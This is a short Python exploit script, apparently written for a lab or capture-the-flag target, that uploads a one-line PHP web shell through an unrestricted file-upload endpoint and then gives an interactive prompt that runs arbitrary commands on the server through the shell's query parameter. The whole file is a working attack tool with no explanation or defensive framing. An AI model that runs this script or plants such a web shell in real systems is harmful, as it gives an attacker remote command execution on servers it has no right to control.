#!/bin/env python3
import requests
from urllib.parse import urljoin
import cmd

URL = "http://apps.proxy/"
# URL = "http://localhost/"


class Exploit(cmd.Cmd):
    def __init__(self, url=URL):
        super(Exploit, self).__init__()
        self.url = url
        self.shell_name = "shell.php"
        self.session = requests.Session()

    def upload(self):
        res = self.session.post(
            urljoin(self.url, "upload/upload.php"),
            files={"file": (self.shell_name, "<?php system($_GET['x']);?>")},
            allow_redirects=False
        )

    def shell(self, command):
        res = self.session.get(
            urljoin(self.url, f"upload/files/{self.shell_name}"),
            params={'x': command}
        )
        return res.text
    
    def default(self, line):
        response = self.shell(line)
        print(response)


if __name__ == "__main__":
    exploit = Exploit()
    exploit.upload()
    exploit.cmdloop()